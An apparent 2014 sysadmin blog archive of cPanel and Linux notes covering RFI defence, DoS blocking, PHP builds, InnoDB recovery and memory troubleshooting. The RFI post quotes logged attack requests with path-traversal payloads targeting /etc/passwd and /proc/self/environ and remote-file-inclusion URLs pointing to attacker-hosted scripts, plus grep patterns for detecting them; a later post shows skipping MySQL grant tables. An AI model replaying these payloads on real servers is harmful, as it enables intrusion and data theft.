Friday, November 14, 2014

Remote File Inclusion (RFI) attacks

Remote File Inclusion (RFI) attacks

Remote File Inclusion (RFI) is a technique used to attack Web applications from a remote computer. Such attacks allow malicious users to run their own code on a vulnerable Web server by including code from a URL to a remote server. When an application executes the malicious code, it may lead to a back-door exploit or technical information retrieval. This is an application vulnerability that is a result of insufficient validation of user inputs.



Disable allow_url_fopen in php.ini by setting it to 0

Enable safe_mode and set open_basedir restrictions (if you know what you're doing - it's not really that safe!)

Lockdown the server environment to prevent the server from making new outbound requests

Using Apache mod_rewrite is also an effective security measure to prevent RFI attacks. To use it, in your .htaccess, add the following lines:

RewriteEngine On
RewriteCond %{QUERY_STRING} (.*)(http|https|ftp)://(.*)
RewriteRule ^(.+)$ - [F,L]

The RewriteCond will match the found pattern, and the RewriteRule determines where to redirect the attacker. Here, the F and L options will block the request.

There are two php.inioptions you can set, which control different aspects of file handling, and work to prevent RFI:

allow_url_fopen=off
allow_url_include=off

The magic_quotes directives represent PHP functionality that automatically escapes quotes passed by the user to the application. For example, in php.ini, set magic_quotes_gpc=On to automatically escape all single and double quotes, backslashes and NULLs with a backslash, in GETs, POSTs and cookies. The other magic quote directive (magic_quotes_runtime=On) will escape quotes for a select list of functions.

Apache log poisoning with LFI




 Apache normally uses two log files: access_log, which contains all valid requests to the Web server, and error_log, which contains error messages.

/etc/httpd/logs/, /opt/lampp/logs/, /usr/local/apache/log, /usr/local/apache/logs/, /usr/local/etc/httpd/logs/, /usr/local/www/logs/thttpd_log, /var/apache/logs/, /var/log/apache/, /var/log/apache-ssl/, /var/log/httpd/, /var/log/httpsd/ssl.access_log


RFI Detection

Just a few commands to find out who's knocking. Feel free to expand on what's here as new RFI attacks are discovered.


grep -hr '\.\.\/\.\.\/' /usr/local/apache/logs/*_log | sed 's/ - \[.*"GET / "/' | awk '{print $1" - "$2" - "$3}' > /tmp/rfi-attacks.log

grep -hr '\/etc\/passwd' /usr/local/apache/logs/*_log | sed 's/ - \[.*"GET / "/' | awk '{print $1" - "$2" - "$3}' > /tmp/rfi-attacks.log

Real World Output (target domain omitted to protect the innocent):
~~~~~~~~~`
208.158.248.5 - example.com - "//lists/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"
208.158.248.5 - example.com - "//newsletter/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"
208.158.248.5 - example.com - "//news/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"
208.158.248.5 - example.com - "//phplist/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"
208.158.248.5 - example.com - "//phpList/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"
208.158.248.5 - example.com - "//admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"
207.191.225.14 - example.com- "/ssa-pampanga-pg-wisdom-v-13xSmAeUo2o.html/?pg=../../../../../../../../../../../../../../../../proc/self/environ?"
207.191.225.14 - example.com - "/?pg=../../../../../../../../../../../../../../../../proc/self/environ?"
67.207.138.14 - example.com - "/?pg=/../../../../../../../../proc/self/environ"
21.26.32.199 - example.com - "/?pg=/../../../../../../../../proc/self/environ"
~~~~~~~~~~~




grep -hr 'SERVEQDOCUMENT_ROOT' /usr/local/apache/logs/*_log | sed 's/ - \[.*"GET / "/' | awk '{print $1" - "$2" - "$3}' > /tmp/rfi-attacks.log

207.191.225.14 - example.com - "/?_SERVEQDOCUMENT_ROOT=http://www.some-RFI-rooted-site.or.kr/bbs/data/zfxid1.txt?"

grep -hr 'DOCUMENT_ROOT' /usr/local/apache/logs/*_log | sed 's/ - \[.*"GET / "/' | awk '{print $1" - "$2" - "$3}' > /tmp/rfi-attacks.log

21.206.20.162 - example.com - "///?_SERVER[DOCUMENT_ROOT]=http://some-RFI-rooted-site.ca/bbs//nyawa.txt??"
10.45.14.165 - example.com - "/%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.some-RFI-rooted-site.com.au/nGagLiks/myfiles/zfxid1.txt?"

grep -hr '\.txt??' /usr/local/apache/logs/*_log | grep -v '\/robots.txt' | sed 's/ - \[.*"GET / "/' | awk '{print $1" - "$2" - "$3}' > /tmp/rfi-attacks.log

10.45.14.165 - example.com- "//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://some-RFI-rooted-site.co.kr/plugins/logs/gue/fx29id.txt??"
21.206.20.162 - example.com- "/ashop/catalogue.php?cat=http://www.some-RFI-rooted-site.com//pdf/1.txt??"


With such a vulnerability, attackers can execute any binary on the server like starting a telnet server, logging in to it with the privileges of a Web server user, performing exploits to gain root access, and perhaps attacking other hosts that are reachable from the compromised server.


Reference

https://documentation.cpanel.net/display/CKB/PHP+Security+Concepts

at No comments:

Wednesday, November 12, 2014

Linux command verifying CMS version on cPanel server

Wordpress version:
 find /home/*/public_html/ -type f -iwholename "*/wp-includes/version.php" -exec grep -H "\$wp_version =" {} \;


 Joomla! 1/2/3 version and release:
 Linux/cPanel:
find /home/*/public_html/ -type f \( -iwholename '*/libraries/joomla/version.php' -o -iwholename '*/libraries/cms/version.php' -o -iwholename '*/libraries/cms/version/version.php' \) -print -exec perl -e 'while (<>) { $release = $1 if m/ \$RELEASE\s+= .([\d.]+).;/; $dev = $1 if m/ \$DEV_LEVEL\s+= .(\d+).;/; } print qq($release.$dev\n);' {} \; && echo "-"

Drupal version
Linux/cPanel:
find /home/*/public_html/ -type f -iwholename "*/modules/system/system.info" -exec grep -H "version = \"" {} \;
 Linux/Plesk:
at No comments:
Labels:

Friday, October 31, 2014

How to prevent DoS attack on a cPanel server

Check and block wordpress and xmlrc attack on a cPanel server


if you are seeing a lot of access to wp-login.php , you can conclude it as a wordpress attack. The below script will show you the sorted list of accessing ip’s to wp-login


====
-----------

egrep 'wp-login.php' /usr/local/apache/domlogs/* | grep -v ftp_log | awk -F : '{print $2}' | awk '{print $1}' | sort | uniq -c | sort -n

====
-----------
we can get the acces log IP from the below script,

grep -r "xx/Aug/2014" /usr/local/apache/domlogs/ | grep "xmlrpc.php" | awk '{ print $1 }' | cut -d : -f2 | sort | uniq -c | sort -n > /root/testwp

-----------
grep wp-login.php /usr/local/apache/domlogs/* grep “16/Jan/2013:03″|awk '{print $1}' | cut -d: -f2 | sort | uniq -c |sort -n | tail



CSF tuning 

vi /etc/csf/csf.conf
----
# To disable this feature, set this to 0
CT_LIMIT = "50"
----


Where 50 is the maximum number of connections from an IP address. You need to specify the port number also.



vi /etc/csf/csf.conf
----
# Leave this option empty to count all ports against CT_LIMIT
CT_PORTS = "80,53,22"
----


Also we can use other CT options .

CT_INTERVAL = "30"
CT_BLOCK_TIME = "1800"



IPTable rule:

iptables -A INPUT -p tcp --dport 80 -m limit --limit 25/minute --limit-burst 100 -j ACCEPT

------------------------
-A : Append
-p : Protocol
--dport : For ports
-m limit : To limit iptables extension
--limit 25/minute : Defines maximum of 25 connection per minute.
--limit-burst 100 : The limit/minute will be enforced only after the total number of connection have reached the limit-burst level, ie 100 here
-j : Target

--------------------------






at No comments:

Wednesday, August 27, 2014

Running Multiple PHP 5 Versions

Cpanel does not support this via direct easy apache.





To my knowledge you either need to do this manually or use CloudLinux, which offers a an addon for this purpose.


For cloud linux please follow the steps below.

http://docs.cloudlinux.com/index.html?installation.html

NB: You must have cagefs & lvemgr for this to work

http://docs.cloudlinux.com/index.html?cagefs.html

Recompile and install the default PHP (Optional)

If the existing installation is fine and has the necessary modules , then you can skip this step. Otherwise you need to recompile it using :D

/scripts/easyapache

Once it is done. You can proceed with the new PHP 5.4.14


Step 1:

Download the source file

mkdir /usr/local/src/php_source

cd /usr/local/src/php_source
wget http://in2.php.net/get/php-5.4.8.tar.gz/from/us1.php.net/mirror

Extract the  cource
tar -xvf php-5.4.14.tar.bz2

You can get the configuration options for the new install from the existing installation using the following command
 php -i |grep configure|sed 's/Configure Command =>  //g'|sed "s/'//g"

Once it is available modify it and make sure the installation path --prefix is specified and is compiled as cgi using the option --enable-cgi. In this case I am using the installation path as --prefix=/usr/local/php54
Make sure to remove the configuration parameter for apxs  ie   --with-apxs2=/usr/local/apache/bin/apxs
The final configuration option for new install will look like the following

 ./configure  --disable-fileinfo --disable-phar --enable-bcmath --enable-calendar --enable-libxml --enable-mbstring --enable-pdo=shared --enable-soap --enable-sockets --enable-wddx --enable-zend-multibyte --enable-zip --prefix=/usr/local/php54 --enable-cgi --with-bz2 --with-curl=/opt/curlssl/ --with-curlwrappers --with-freetype-dir=/usr --with-gd --with-gettext --with-imap=/opt/php_with_imap_client/ --with-imap-ssl=/usr --with-jpeg-dir=/usr --with-kerberos --with-libdir=lib64 --with-libexpat-dir=/usr --with-libxml-dir=/opt/xml2/ --with-mcrypt=/opt/libmcrypt/ --with-mm=/opt/mm/ --with-mysql=/usr --with-mysql-sock=/var/lib/mysql/mysql.sock --with-mysqli=/usr/bin/mysql_config --with-openssl=/usr --with-openssl-dir=/usr --with-pcre-regex=/opt/pcre --with-pdo-mysql=shared --with-pdo-sqlite=shared --with-pic --with-png-dir=/usr --with-pspell --with-tidy=/opt/tidy/ --with-xmlrpc --with-xpm-dir=/usr --with-xsl=/opt/xslt/ --with-zlib --with-zlib-dir=/usr

 Once the configuration is complete. Make the compilation using the following command

 make
Now proceed with the installation

make install

Once the installation is complete you will get an output like the following one

# make install
Installing shared extensions:     /usr/local/php54/lib/php/extensions/no-debug-non-zts-20100525/
Installing PHP CLI binary:        /usr/local/php54/bin/
Installing PHP CLI man page:      /usr/local/php54/php/man/man1/
Installing PHP CGI binary:        /usr/local/php54/bin/

Once the installation is completed, confirm the version by using the command

#  /usr/local/php54/bin/php -v
PHP 5.4.14 (cli) (built: May  3 2013 12:21:56)
Copyright (c) 1997-2013 The PHP Group
Zend Engine v2.4.0, Copyright (c) 1998-2013 Zend Technologies

Now we need to configure it for web server access

It is performed through specifying the new PHP handler for php file

AddHandler specifically is meant to communicate with the server. It assigns or "maps" a handler to the file extension you specify, giving the server instructions on how to deal with it. For example, AddHandler could be used to activate a particular file type, which is why it must communicate with the server.

Eg:

AddHandler application/x-httpd-php54 .php
The AddHandler directive tells Apache that whenever it encounters a file with a .php extension, it should mark it as having a MIME type of application/x-httpd-php54.


Action application/x-httpd-php54 /cgi-sys/php54
The Action directive tells Apache that whenever it encounters a file of type application/x-httpd-php53 it should pass it to the script /cgi-sys/php54 and capture the output.

Assume that you are working on default cPanel server.

Open the file /usr/local/apache/conf/includes/pre_virtualhost_global.conf and add the following entries to enable

Add the following lines to the above file and save

Action application/x-httpd-php54 /cgi-sys/php54
 AddType application/x-httpd-php54 .php54

To make cPanel skip the .htacces scan and remove the mime types, do the  followin

/usr/local/cpanel/bin/apache_conf_distiller --update
touch /var/cpanel/easy_skip_update_php_mime_types

vi /usr/local/cpanel/cgi-sys/php54
Add the following contents to the above file and save
#!/bin/sh
exec /usr/local/php54/bin/php-cgi
Setting Permissions
chown root:wheel /usr/local/cpanel/cgi-sys/php54
chmod +x /usr/local/cpanel/cgi-sys/php54
Soft-linking for command-line executions:
ln -s /usr/local/php54/bin/php-cgi /usr/local/bin/php54

Copying php.ini from build folder
mv /usr/local/php_source/php.ini-production /usr/local/php54/lib/php.ini
You need to restart httpd after the configuration
/etc/init.d/httpd restart
Now everything is set. If you want to enable php5.3 for a particular account, create a .htaccess file as mentioned below.

nano -w /home/$username/public_html/.htaccess
AddHandler application/x-httpd-php54 .php

chown $username:$username /home/$username/public_html/.htaccess
chmod 644 /home/$username/public_html/.htaccess


at No comments:

Thursday, August 14, 2014

InnoDB Crash Recovery Guide


STOP : If there are any problems or you are uncomfortable doing this procedure, do not proceed and ASK A COWORKER  :D :D :D 

  • Make sure you have free disk space in /home and /var/lib/mysql or where ever your mysql databases are stored. This guide assumes they are in /var/lib/mysql.

FOR CPANEL[edit]

Step 1: Disable tailwatchd (chkservd on 11.23) to prevent mysql from being restarted. Stop any other processes that may access mysql including munin, backups, and the webserver if possible.
 killall -TERM tailwatchd
Step 2: Add
 innodb_force_recovery = 3
to /etc/my.cnf
Step 3: Restart mysql
 /etc/init.d/mysqld restart
Step 4: Verify mysql is up
Step 5: Put this script in ~/recover.pl and run it
#!/usr/bin/perl
 
BEGIN { unshift @INC, '/usr/local/cpanel'; }
 
use Cpanel::MysqlUtils         ();
 
mkdir('/home/innodb_dumps',0700);
 
chdir('/home/innodb_dumps') || die "Could not create /home/innodb_dumps";
 
my $pwd = `pwd`;
chomp($pwd);
my $hasinnodb = 0;
my $dbdir     = Cpanel::MysqlUtils::getmysqldir();
my $dbcheckok = -d $dbdir . '/mysql' ? 1 : 0;
if ($dbcheckok) {
    opendir( my $sql_dh, $dbdir );
    while ( my $db = readdir($sql_dh) ) {
        next if ( $db =~ m/^\.+$/ );
        next if $db eq 'mysql';    # mysql db should never have InnoDB on
        next if $db eq 'horde';    # Horde session table is the only one that uses InnoDB, so this is not a problem
        next if ( !-d $dbdir . '/' . $db );
        my $ms = sqlcmd("show table status from `$db`;");
        if ( !$ms ) {
            $dbcheckok = 0;
            last;
        }
        elsif ( $ms =~ m/\s+InnoDB\s+/m ) {
                print "Saving to $pwd/$db.sql...";
                system "mysqldump -c $db > $db.sql";
                print "Done\n";
        }
    }
    closedir($sql_dh);
}
 
 
 
 
sub sqlcmd {
    my ($cmd) = @_;
    my $result;
 
    my $mysql = Cpanel::MysqlUtils::find_mysql();
    my $pid = IPC::Open3::open3( \*WTRFH, \*RDRFH, ">&STDERR", $mysql, '-N' );
    print WTRFH "show status like 'uptime'; $cmd\n";    #make sure we already get something back so we know mysql is up
    close(WTRFH);
    while (<RDRFH>) {
        $result .= $_;
    }
    close(RDRFH);
    waitpid( $pid, 0 );
    return $result;
}
If the script fails, remove your backup attempt in /home/innodb_dumps, increase the innodb_recovery_level in /etc/my.cnf, restart MySQL, and rerun the script. Repeat until you complete a backup without errors
Step 6: Stop MySQL
Step 7: Do this:
 mkdir /var/lib/mysql/INNODB_BACKUPS
 mv /var/lib/mysql/ib* /var/lib/mysql/INNODB_BACKUPS

cd /home/innodb_dumps
for i in $(ls -1  | cut -d'.' -f1) ; do mv /var/lib/mysql/$i  /var/lib/mysql/INNODB_BACKUPS/ ;  mkdir /var/lib/mysql/$i ; chown mysql. /var/lib/mysql/$i ; done
Step 8: For each database that was dumped to /home/innodb_dumps move (do not copy, completely move, or the database may not be properly recreated from the backups you made) the /var/lib/mysql/DBNAME folder to the /var/lib/mysql/INNODB_BACKUPS directory
Step 9: Create folders for each database that was moved in /var/lib/mysql and chown them to mysql:mysql
Step 10: Remove the following from my.cnf and start mysql:
 innodb_force_recovery = 3
Step 11: Start mysql and restore all databases in /home/innodb_dumps to their respective database
cd /home/innodb_dumps
for i in * ; do x=$(echo $i | cut -d'.' -f1) ;  mysql -o $x < $i ; done
Step 12: Check the mysql server logs to ensure there were no errors
Step 13: Restart mysql and party.

FOR ALL OTHER LINUXES 

Step 1: Add
 innodb_force_recovery = 3
to /etc/my.cnf
Step 2: Restart mysql
 /etc/init.d/mysqld restart
Step 3: Verify mysql is up
Step 4: Dump all innodb databases to a directory i.e /root or /root/recovery
Step 5: Stop MySQL
Step 6: Do this:
 mkdir /var/lib/mysql/INNODB_BACKUPS
 mv /var/lib/mysql/ib* /var/lib/mysql/INNODB_BACKUPS
Step 7: For each database that was dumped move the /var/lib/mysql/DBNAME folder to the /var/lib/mysql/INNODB_BACKUPS directory
Step 8: Create folders for each database that was moved in /var/lib/mysql and chown them to mysql:mysql
Step 9: Remove the following from my.cnf and start mysql:
 innodb_force_recovery = 3
Step 10: Start mysql and restore all databases in /home/innodb_dumps to their respective database
Step 11: Check the mysql server logs to ensure there were no errors
Step 12: Restart mysql and party.
at No comments:
Labels:

Installing and Configuring LiteSpeed Web Server (LSWS) and The PHP

Installing 

The installation of LSWS is pretty straight forward. You can actually install it anywhere but for the sake of simplicity and standardization, we will always be installing it to /opt on the server. This way, if there is a problem and it needs to be checked on, we will always know where it is. Additionally, as you will see from the setup steps below, these too will be the standard install. Lastly, for standardization, please make sure that during the install LSWS is set to listen on 7080 (admin console) and 8088 (verification page).

The installation 

SSH into the box as root
chmod 0755 /usr/bin/gcc

cd /opt

Download the installation files to /opt and untar them. All available versions of LiteSpeed Web Server can be found at http://www.litespeedtech.com/products/webserver/download/. Please also note that we only provide licensing and support for Enterprise edition and not standard so when installing this for a client, you will need to use have the registration number.

wget http://www.litespeedtech.com/packages/4.0/lsws-4.0-ent-i386-linux.tar.gz

tar -zxvf lsws-4.0-ent-*

cd lsws*

Now, you need to get the serial number for the install. To do this, cd into the installation folder (the same one that contains install.sh) and from the command line, without the quotes, as root, run:

echo "SERIAL NUMBER GOES HERE" > serial.no chmod +x install.sh
./install.sh

The install should now be moving along. For the specifics on the install, please refer to the below prompts:

Installation Prompts 

 Prepare PHP 

PHP is somewhat of an inconvenience on LSWS as it uses it's own "special" kind of PHP with certain CFLAGS, the most important of these CFLAGS are --prefix=/lsphp5 and --with-litespeed. If you compile PHP through EasyApache, you will not mess anything up however, you the changes will not be used by LiteSpeed and as such you need to compile PHP through LiteSpeed but thankfully this is pretty straight forward but a little more time consuming. The below addresses recompiling PHP to add something to it.

First, SSH into the box as root. Next, find out what CFLAGS the current PHP version has with php -i | less in the section, Configure Command => you will see all of the flags used to compile it originally. When we do this on a testing box, we see:


'./configure' '--prefix=/lsphp5' '--with-litespeed' '--disable-pdo' '--enable-bcmath' '--enable-calendar' '--enable-ftp' '--enable-gd-native-ttf' '--enable-libxml' '--enable-magic-quotes' '--enable-sockets' '--enable-zip' '--prefix=/usr/local' '--with-apxs2=/usr/local/apache/bin/apxs' '--with-bz2' '--with-curl=/opt/curlssl/' '--with-freetype-dir=/usr' '--with-gd' '--with-imap=/opt/php_with_imap_client/' '--with-imap-ssl=/usr' '--with-jpeg-dir=/usr' '--with-kerberos' '--with-libxml-dir=/opt/xml2/' '--with-mcrypt=/opt/libmcrypt/' '--with-mhash=/opt/mhash/' '--with-mysql=/usr' '--with-mysql-sock=/var/lib/mysql/mysql.sock' '--with-png-dir=/usr' '--with-ttf' '--with-xpm-dir=/usr/X11R6' '--with-zlib' '--with-zlib-dir=/usr'

Now that we know what CFLAGS were given by EasyApache, we need to migrate those to the LSWS PHP installation. This is kind of a crappy way to do it but it's how it will get done. Copy the CFLAGS you get from the above command and put them in notepad. On the server:

mkdir ~/phptest && cd ~/phptest
wget http://us2.php.net/get/php-5.2.9.tar.gz/from/uk.php.net/mirror (or get whatever source version they are getting)
tar -zxvf php-*
cd php-*
./buildconf --force
Now we need to do a dry run of the CFLAGS to make sure that they will be parsed properly when compiling through LSWS's PHP thing. Take the CFLAGS you will need to add, and include them to your ./configure line that you put on notepad. So, if they want to recompile PHP with TTF, you would add:

'./configure' '--prefix=/lsphp5' ... '--with-ttf'

So, from the PHP source directory, run the compile command and make sure that it exists cleanly. You will likely need to yum -y install package and package-devel for it to compile cleanly. You could always specify the EasyApache directory but I haven't tested anything other than default in LSWS's PHP installer/compiler. For example, if you ware trying to compile with the TTF as seen above, and it throws an error about not being able to find the headers, simply yum -y install ttf ttf-devel. Once you have a ./configure like that completes cleanly, you then need to port the CFLAGs to LSWS PHP compiler admin thing.

Config PHP in LSWS 


First, log into the LSWS admin console with the LSWS username and password

Then, navigate to the PHP compilation section which can be found at

We then need to put the CFLAGs into the appropriate window which is pretty easy to spot.

Note that when setting the CFLAGS you do not need to enclose them in ' ' as you do when compiling from the command line.

 ./configure --prefix=/lsphp5 --with-litespeed --disable-pdo --enable-bcmath --enable-calendar --enable-ftp --enable-gd-native-ttf --enable-libxml --enable-magic-quotes --enable-sockets --enable-zip --prefix=/usr/local --with-apxs2=/usr/local/apache/bin/apxs --with-bz2 --with-curl=/opt/curlssl/ --with-freetype-dir=/usr --with-gd --with-imap=/opt/php_with_imap_client/ --with-imap-ssl=/usr --with-jpeg-dir=/usr --with-kerberos --with-libxml-dir=/opt/xml2/ --with-mcrypt=/opt/libmcrypt/ --with-mhash=/opt/mhash/ --with-mysql=/usr --with-mysql-sock=/var/lib/mysql/mysql.sock --with-png-dir=/usr --with-ttf --with-xpm-dir=/usr/X11R6 --with-zlib --with-zlib-dir=/usr
at No comments:
Labels:

Reset MySQL Password

Of course you can easily reset it through cpanel.

Or on debian you can reset it with

dpkg-reconfigure <mysql package>
You can find the package by typing

dpkg --list | grep mysql
dpkg-reconfigure mysql-server-5.0

But just in case none of those ways are available, you can get mysql to start without asking for a password.

Allowing MySQL to start without asking for a password

First, stop MySQL from running.

Debian/CentOS

/etc/init.d/mysql stop
The start it, but tell it to not look for grant tables

mysqld --user-mysql --skip-grant-tables &

Reset the password 

mysql

UPDATE mysql.user SET Password=PASSWORD('MyNewPass') WHERE User='root';
FLUSH PRIVILEGES;
Then do what you want. If you just need root access to dump a database or something, don't even need to change the password.

Should work for other users if you need that password for whatever reason and can't find it.

Restarting the mysql service 

killall mysqld
/etc/init.d/mysql start
   

at No comments:
Labels:

DDOS Auto block script CSF


This script can be used with csf to block connections on a server automatically if a client is getting really flooded. To use this you must change /etc/csf/csf.conf's deny limit from 100 to 0 and restart csf and load this script up.


#!/bin/bash
 
netstat -anp |grep ':80' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n > ~/curr
while read list
do
        conns=`echo $list | awk '{print $1}'`
        ip=`echo $list | awk '{print $2}'`
        if [ "$conns" -ge 20 ]
        then
                exist=`cat /etc/csf/csf.deny | grep $ip`
                if [ "$ip" != "$exist" ]
                then
                        echo blocking $ip with $conns connections
                        iptables -I INPUT -s $ip -j DROP
                        echo $ip >> /etc/csf/csf.deny
                        blocked=`echo yes`
                fi
                blocked=`echo yes`
        fi
done < ~/curr
 
if [ $blocked == "yes" ]
then
        /etc/init.d/httpd stop
        pkill httpd
        /etc/init.d/httpd start
fi
put in ~ on server add to crontab as so:
 */1 * * * * /root/autoblock.sh >> /var/log/autoblock
and change the 20 next to -ge to whatever threshold you would like on port 80
at No comments:
Labels: ,

Wednesday, July 30, 2014

Linux Memory Troubleshooting

Empty buffer cache
sync && echo 1 > /proc/sys/vm/drop_caches

clean up memory of unnecessary things (Kernerl 2.6.16 or newer)run sync first to flush useful things out to disk!!!
To free pagecache:

echo 1 > /proc/sys/vm/drop_caches    

To free dentries and inodes:

echo 2 > /proc/sys/vm/drop_caches

To free pagecache, dentries and inodes:

echo 3 > /proc/sys/vm/drop_caches
########################### < Memory Troubleshooting > ###########################
TOP 10 MEMORY USERS
ps auxk-rss | head -11 | cut -c1-120
MEMORY % VIA SAR
sar -r | grep -v Average | awk '{print $1" "$2" \t%"$5}'
(unset LANG ;sar -r) |awk '$3~/[0-9]/{total=$3+$2; usedbc=$3-($5+$6); pc_used=(100*usedbc)/total;print $0,pc_used} $3!~/[0-9]/{print $0}' | awk '{print $1" - "$11"%"}'
MEMORY % (RHEL 4)
sar -r | tail -n21 | head -n20 | awk '{ printf "%s -- %3.2f%%\n",$1,($3-$5-$6)*100/($3+$2)}'
DAILY MEMORY AVERAGES
sar -r | grep Average: | awk '{print $1" \t"$4"%"}'
for i in `ls -rt /var/log/sa/ | grep -E "sa[0-9][0-9]"`; do echo -ne "$i -- "; sar -r -f /var/log/sa/$i | grep -Ev "Linux|Average|RESTART|kbmemfree|^$" | awk '{ printf "%3.2f\n",($4-$6-$7)*100/($3+$4)}' | awk '{sum+=$1 } END { printf "Average = %3.2f%%\n",sum/NR}'; done
MONTHLY AVERAGES
for i in `ls /var/log/sa/ | egrep 'sa[0-9][0-9]'` ; do sar -f /var/log/sa/$i -r | grep Average | awk '{print $1" "$4"%"}' ; done
sar -r | grep -v Average | awk '{print $1" "$2" \t"$5"%"}';sar -r | grep Average: | awk '{print $1" \t"$4"%"}'
BETTER FREE REPORT
date ; free -mt ; free -m|awk 'NR==2{print "The total % of "Mem" Used: "($3*100)/$2"%"}'
MEMORY SUMMARY
vmstat -s -S M
echo -ne '\n';echo "===========================================";ps -eo user,%cpu,%mem,rsz,args|sort -rnk4|awk 'BEGIN {printf "%s\t%s\t%s\t%s\t%s\n","USER","%CPU","%MEM","RSZ","COMMAND"}{printf "%s\t%g'%'\t%g'%'\t%d MB\t%-10s\n",$1,$2,$3,$4/1024,$5}'|head -n30;echo "===========================================";echo -e "\n===========================================";vmstat -s -S M|head -n10;echo "===========================================";
CACHE CLEARING
sync; echo "2" > /proc/sys/vm/drop_caches; sleep 10; echo "0" > /proc/sys/vm/drop_caches
APACHE MEMORY USAGE
ps -eo rsz,args | grep httpd | awk ' { SUM += $1 } END { print "Memory used by Apache = "SUM/1024 " Megs" "\nNumber of process runing = " NR "\nAverage of each process mem usage = " SUM/1024/NR " Megs"} '
JAVA MEMORY USAGE
ps afux | grep java | grep -Eo "\-Xmx[0-9]+[m|g] "
</code>
More Memory Investigation
free -mt
vmstat -a -S m
ps auxk-rss |head -11
ps auxk-rss |head -11 | awk '{print $1, $4, $11}'

#Memory %
sar -r | grep -v Average | awk '{print $1" "$2" \t%"$5}'
#Memory Average %
sar -r | grep Average: | awk '{print $1" \t"$4"%"}'

#Monthly Averges
for i in `ls /var/log/sa/ | egrep 'sa[0-9][0-9]'` ; do sar -f /var/log/sa/$i -r | grep Average | awk '{print $1" "$4"%"}' ; done

sar -r | grep -v Average | awk '{print $1" "$2" \t"$5"%"}';sar -r | grep Average: | awk '{print $1" \t"$4"%"}'

date ; free -mt ; free -m|awk 'NR==2{print "The total % of "Mem" Used: "($3*100)/$2"%"}'

#Nimbus Memory %
(unset LANG ;sar -r) |awk '$3~/[0-9]/{total=$3+$2; usedbc=$3-($5+$6); pc_used=(100*usedbc)/total;print $0,pc_used} $3!~/[0-9]/{print $0}' | awk '{print $1" - "$11"%"}'

#Nimbus Memory % (RHEL 4)
sar -r | tail -n21 | head -n20 | awk '{ printf "%s -- %3.2f%%\n",$1,($3-$5-$6)*100/($3+$2)}'

#Summary
vmstat -s -S M

#More detailed overview!
slabtop
#push c to sort by highest cache user!

#Cool trick to clear cache!
[root@269179-db2 ~]# sync
[root@269179-db2 ~]# echo "2" > /proc/sys/vm/drop_caches
[root@269179-db2 ~]# sleep 10
[root@269179-db2 ~]# echo "0" > /proc/sys/vm/drop_caches

#Apache memory:
 ps -eo rsz,args | grep httpd | awk ' { SUM += $1 } END { print "Memory used by Apache = "SUM/1024 " Megs" "\nNumber of process runing = " NR "\nAverage of each process mem usage = " SUM/1024/NR " Megs"} '


low memory:
resize;clear;echo;date;echo "Top 10 Processes by MEM %"; vmstat -a -S m|tail -n1|awk \
'BEGIN {FS=" "}{printf "\nAvail\tActive\tTotal\tPercent Avail\n%sMB\t\
%sMB\t%sMB\t%s\n\n",$4+$5,$6,$4+$5+$6,($4+$5)/($4+$5+$6)*100}';ps -eo \
user,%cpu,%mem,rsz,args|sort -rnk4|awk 'BEGIN {printf "%8s %6s %6s \
%8s     %-10s\n","USER","%CPU","%MEM","RSZ","COMMAND"}{printf "%8s %6s \
%6s %8s MB  %-10s\n",$1,$2,$3,$4/1024,$5}'|head -n10; echo ""; echo "== \
Last Half Hour ==";echo; sar -r|head -n3; sar -r|tail -n4;echo; sar -B|\
head -n3; sar -B|tail -n4;echo;echo "== Current 2 Second Intervals ==";\
echo;sar -r 2 5;echo;sar -B 2 5

#Something with memory and sar
for i in `ls -rt /var/log/sa/ | grep -E "sa[0-9][0-9]"`; do echo -ne "$i -- "; sar -r -f /var/log/sa/$i | grep -Ev "Linux|Average|RESTART|kbmemfree|^$" | awk '{ printf "%3.2f\n",($4-$6-$7)*100/($3+$4)}' | awk '{sum+=$1 } END { printf "Average = %3.2f%%\n",sum/NR}'; done
Show whats using SWAP:
sh swapusage.sh | sort -n -k1 | tac | head -n10
#!/bin/bash
#
# show swap used by processes
#
(for PROCESS in /proc/*/; do
  swapused=$(awk 'BEGIN { total = 0 } /^Swap:[[:blank:]]*[1-9]/ { total = total + $2 } END { print total }' ${PROCESS}/smaps 2>/dev/null || echo 0)
  if [ $swapused -gt 0 ]; then
    /bin/echo -e "${swapused}k\t$(cat ${PROCESS}/cmdline)"
  fi
done ) | sort -nr
#!/bin/bash
# Get current swap usage for all running processes
# Erik Ljungstrom 27/05/2011
SUM=0
OVERALL=0
for DIR in `find /proc/ -maxdepth 1 -type d | egrep "^/proc/[0-9]"` ; do
PID=`echo $DIR | cut -d / -f 3`
PROGNAME=`ps -p $PID -o comm --no-headers`
for SWAP in `grep Swap $DIR/smaps 2>/dev/null| awk '{ print $2 }'`
do
let SUM=$SUM+$SWAP
done
echo "PID=$PID - Swap used: $SUM - ($PROGNAME )"
let OVERALL=$OVERALL+$SUM
SUM=0

done
echo "Overall swap used: $OVERALL"
Pipe thru this for only swap using procs:
| egrep -v "Swap used: 0" |sort -n -k 5
Swap one liner:
SUM=0; OVERALL=0; for DIR in `find /proc/ -maxdepth 1 -type d | egrep "^/proc/[0-9]"` ; do PID=`echo $DIR | cut -d / -f 3
at No comments:
Labels: ,

Server monitoring script :)

Script for find out abusive user in server

~~~~~~~~~~~

